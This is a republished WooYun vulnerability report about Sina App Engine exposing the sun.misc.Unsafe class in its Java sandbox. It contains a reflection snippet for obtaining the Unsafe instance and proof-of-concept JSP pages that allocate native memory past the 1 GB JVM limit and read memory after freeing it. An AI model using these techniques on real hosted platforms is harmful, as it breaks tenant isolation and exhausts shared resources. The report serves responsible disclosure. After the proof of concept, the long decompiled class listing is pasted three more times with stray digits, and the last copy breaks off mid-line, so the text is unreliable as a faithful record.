SAE允许JVM内存对象直接读写操作 admin 140816文章 117评论 2015年5月23日23:47:25评论353 views字数 210阅读0分42秒阅读模式 摘要2014-08-17: 细节已通知厂商并且等待厂商处理中 2014-08-19: 厂商已经确认,细节仅向厂商公开 2014-08-29: 细节向核心白帽子及相关领域专家公开 2014-09-08: 细节向普通白帽子公开 2014-09-18: 细节向实习白帽子公开 2014-10-01: 细节向公众公开 漏洞概要 关注数(104) 关注此漏洞 缺陷编号: WooYun-2014-72739 漏洞标题: SAE允许JVM内存对象直接读写操作 相关厂商: 新浪 漏洞作者: Nebula 提交时间: 2014-08-17 00:21 公开时间: 2014-10-01 00:22 漏洞类型: 设计缺陷/逻辑错误 危害等级: 高 自评Rank: 10 漏洞状态: 厂商已经确认 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: 沙盒环境缺陷 17人收藏 漏洞详情 披露状态: 2014-08-17: 细节已通知厂商并且等待厂商处理中 2014-08-19: 厂商已经确认,细节仅向厂商公开 2014-08-29: 细节向核心白帽子及相关领域专家公开 2014-09-08: 细节向普通白帽子公开 2014-09-18: 细节向实习白帽子公开 2014-10-01: 细节向公众公开 简要描述: RT! 详细说明: //本来想写篇文章的,但怕牵扯到某些公司云沙盒环境 code 区域 sun.misc.Unsafe是当年sun公司操作内存的内部API,没有公开.有些JDK已经去掉了这个类.但大部分的jdk依然保留着. code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } code 区域 看到我们是无法去new这个类的,但是看到最后几行: static { registerNatives(); theUnsafe = new Unsafe(); } 默认是由于自己初始化的,它有个 (private static final Unsafe theUnsafe;)theUnsafe属性,那我们可以用反射去调用它了. code 区域 Field field = sun.misc.Unsafe.class.getDeclaredField("theUnsafe"); field.setAccessible(true); Unsafe unsafe = (sun.misc.Unsafe) field.get(null);//获取实例 code 区域 有人说它是sun公司留下的后门,呵呵! 漏洞证明: code 区域 SAE使用的openjdk也有这个类,且没有禁用掉. code 区域 用unsafe去申请1个字节的内存,并赋值123456: index.jsp: <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ page language="java" import="java.lang.reflect.Field,sun.misc.Unsafe" %> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title></title> </head> <body> <% java.lang.reflect.Field field = sun.misc.Unsafe.class.getDeclaredField("theUnsafe"); field.setAccessible(true); sun.misc.Unsafe unsafe = (sun.misc.Unsafe) field.get(null); long address=unsafe.allocateMemory(1); long value=123456; unsafe.putLong(address, value); %> 申请的地址: <%= address%><br> 获取地址填充的值123456: <%= unsafe.getAddress(address)%><br> 释放内存:<% unsafe.freeMemory(address);%>******<br> 获取地址填充的值123456: <%= unsafe.getAddress(address)%> </body> </html> http://unsafe1.sinaapp.com/ code 区域 申请的地址: 140193168417552,可以看到地址是140193168417552,根我想像的云环境内存分配不一样,没有隔离内存. 我大致计算了一下,大概:130565个G=140193168417552/(1024*1024*1024) 大概是我们应用所在环境的内存使用总量,可以多刷新自己看看变化幅度. code 区域 创建java应用,JVM上限是1个G.但能使用unsafe这个类,这就不对了! long address=unsafe.allocateMemory(1024*1024*1700); 申请1.7G内存: http://unsafe1.sinaapp.com/1700M_allocateMemory.jsp code 区域 1700M_allocateMemory.jsp java.lang.reflect.Field field = sun.misc.Unsafe.class.getDeclaredField("theUnsafe"); field.setAccessible(true); sun.misc.Unsafe unsafe = (sun.misc.Unsafe) field.get(null); long address=unsafe.allocateMemory(1024*1024*1700); code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 0 code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void putShortVolatile(Object paramObject, long paramLong, short paramShort); public native char getCharVolatile(Object paramObject, long paramLong); public native void putCharVolatile(Object paramObject, long paramLong, char paramChar); public native long getLongVolatile(Object paramObject, long paramLong); public native void putLongVolatile(Object paramObject, long paramLong1, long paramLong2); public native float getFloatVolatile(Object paramObject, long paramLong); public native void putFloatVolatile(Object paramObject, long paramLong, float paramFloat); public native double getDoubleVolatile(Object paramObject, long paramLong); public native void putDoubleVolatile(Object paramObject, long paramLong, double paramDouble); public native void putOrderedObject(Object paramObject1, long paramLong, Object paramObject2); public native void putOrderedInt(Object paramObject, long paramLong, int paramInt); public native void putOrderedLong(Object paramObject, long paramLong1, long paramLong2); public native void unpark(Object paramObject); public native void park(boolean paramBoolean, long paramLong); public native int getLoadAverage(double[] paramArrayOfDouble, int paramInt); static { registerNatives(); theUnsafe = new Unsafe(); } } 1 code 区域 sun.misc.Unsafe看名字就知道,不安全的.反编译的大致源码: package sun.misc; import java.lang.reflect.Field; import java.lang.reflect.Modifier; import java.security.ProtectionDomain; import sun.reflect.Reflection; public final class Unsafe { private static final Unsafe theUnsafe; public static final int INVALID_FIELD_OFFSET = -1; private static native void registerNatives(); public static Unsafe getUnsafe() { Class localClass = Reflection.getCallerClass(2); if (localClass.getClassLoader() != null) throw new SecurityException("Unsafe"); return theUnsafe; } public native int getInt(Object paramObject, long paramLong); public native void putInt(Object paramObject, long paramLong, int paramInt); public native Object getObject(Object paramObject, long paramLong); public native void putObject(Object paramObject1, long paramLong, Object paramObject2); public native boolean getBoolean(Object paramObject, long paramLong); public native void putBoolean(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByte(Object paramObject, long paramLong); public native void putByte(Object paramObject, long paramLong, byte paramByte); public native short getShort(Object paramObject, long paramLong); public native void putShort(Object paramObject, long paramLong, short paramShort); public native char getChar(Object paramObject, long paramLong); public native void putChar(Object paramObject, long paramLong, char paramChar); public native long getLong(Object paramObject, long paramLong); public native void putLong(Object paramObject, long paramLong1, long paramLong2); public native float getFloat(Object paramObject, long paramLong); public native void putFloat(Object paramObject, long paramLong, float paramFloat); public native double getDouble(Object paramObject, long paramLong); public native void putDouble(Object paramObject, long paramLong, double paramDouble); @Deprecated public int getInt(Object paramObject, int paramInt) { return getInt(paramObject, paramInt); } @Deprecated public void putInt(Object paramObject, int paramInt1, int paramInt2) { putInt(paramObject, paramInt1, paramInt2); } @Deprecated public Object getObject(Object paramObject, int paramInt) { return getObject(paramObject, paramInt); } @Deprecated public void putObject(Object paramObject1, int paramInt, Object paramObject2) { putObject(paramObject1, paramInt, paramObject2); } @Deprecated public boolean getBoolean(Object paramObject, int paramInt) { return getBoolean(paramObject, paramInt); } @Deprecated public void putBoolean(Object paramObject, int paramInt, boolean paramBoolean) { putBoolean(paramObject, paramInt, paramBoolean); } @Deprecated public byte getByte(Object paramObject, int paramInt) { return getByte(paramObject, paramInt); } @Deprecated public void putByte(Object paramObject, int paramInt, byte paramByte) { putByte(paramObject, paramInt, paramByte); } @Deprecated public short getShort(Object paramObject, int paramInt) { return getShort(paramObject, paramInt); } @Deprecated public void putShort(Object paramObject, int paramInt, short paramShort) { putShort(paramObject, paramInt, paramShort); } @Deprecated public char getChar(Object paramObject, int paramInt) { return getChar(paramObject, paramInt); } @Deprecated public void putChar(Object paramObject, int paramInt, char paramChar) { putChar(paramObject, paramInt, paramChar); } @Deprecated public long getLong(Object paramObject, int paramInt) { return getLong(paramObject, paramInt); } @Deprecated public void putLong(Object paramObject, int paramInt, long paramLong) { putLong(paramObject, paramInt, paramLong); } @Deprecated public float getFloat(Object paramObject, int paramInt) { return getFloat(paramObject, paramInt); } @Deprecated public void putFloat(Object paramObject, int paramInt, float paramFloat) { putFloat(paramObject, paramInt, paramFloat); } @Deprecated public double getDouble(Object paramObject, int paramInt) { return getDouble(paramObject, paramInt); } @Deprecated public void putDouble(Object paramObject, int paramInt, double paramDouble) { putDouble(paramObject, paramInt, paramDouble); } public native byte getByte(long paramLong); public native void putByte(long paramLong, byte paramByte); public native short getShort(long paramLong); public native void putShort(long paramLong, short paramShort); public native char getChar(long paramLong); public native void putChar(long paramLong, char paramChar); public native int getInt(long paramLong); public native void putInt(long paramLong, int paramInt); public native long getLong(long paramLong); public native void putLong(long paramLong1, long paramLong2); public native float getFloat(long paramLong); public native void putFloat(long paramLong, float paramFloat); public native double getDouble(long paramLong); public native void putDouble(long paramLong, double paramDouble); public native long getAddress(long paramLong); public native void putAddress(long paramLong1, long paramLong2); public native long allocateMemory(long paramLong); public native long reallocateMemory(long paramLong1, long paramLong2); public native void setMemory(long paramLong1, long paramLong2, byte paramByte); public native void copyMemory(Object paramObject1, long paramLong1, Object paramObject2, long paramLong2, long paramLong3); public void copyMemory(long paramLong1, long paramLong2, long paramLong3) { copyMemory(null, paramLong1, null, paramLong2, paramLong3); } public native void freeMemory(long paramLong); @Deprecated public int fieldOffset(Field paramField) { if (Modifier.isStatic(paramField.getModifiers())) { return (int)staticFieldOffset(paramField); } return (int)objectFieldOffset(paramField); } @Deprecated public Object staticFieldBase(Class paramClass) { Field[] arrayOfField = paramClass.getDeclaredFields(); for (int i = 0; i < arrayOfField.length; i++) { if (Modifier.isStatic(arrayOfField[i].getModifiers())) { return staticFieldBase(arrayOfField[i]); } } return null; } public native long staticFieldOffset(Field paramField); public native long objectFieldOffset(Field paramField); public native Object staticFieldBase(Field paramField); public native void ensureClassInitialized(Class paramClass); public native int arrayBaseOffset(Class paramClass); public native int arrayIndexScale(Class paramClass); public native int addressSize(); public native int pageSize(); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2, ClassLoader paramClassLoader, ProtectionDomain paramProtectionDomain); public native Class defineClass(String paramString, byte[] paramArrayOfByte, int paramInt1, int paramInt2); public native Object allocateInstance(Class paramClass) throws InstantiationException; public native void monitorEnter(Object paramObject); public native void monitorExit(Object paramObject); public native boolean tryMonitorEnter(Object paramObject); public native void throwException(Throwable paramThrowable); public final native boolean compareAndSwapObject(Object paramObject1, long paramLong, Object paramObject2, Object paramObject3); public final native boolean compareAndSwapInt(Object paramObject, long paramLong, int paramInt1, int paramInt2); public final native boolean compareAndSwapLong(Object paramObject, long paramLong1, long paramLong2, long paramLong3); public native Object getObjectVolatile(Object paramObject, long paramLong); public native void putObjectVolatile(Object paramObject1, long paramLong, Object paramObject2); public native int getIntVolatile(Object paramObject, long paramLong); public native void putIntVolatile(Object paramObject, long paramLong, int paramInt); public native boolean getBooleanVolatile(Object paramObject, long paramLong); public native void putBooleanVolatile(Object paramObject, long paramLong, boolean paramBoolean); public native byte getByteVolatile(Object paramObject, long paramLong); public native void putByteVolatile(Object paramObject, long paramLong, byte paramByte); public native short getShortVolatile(Object paramObject, long paramLong); public native void 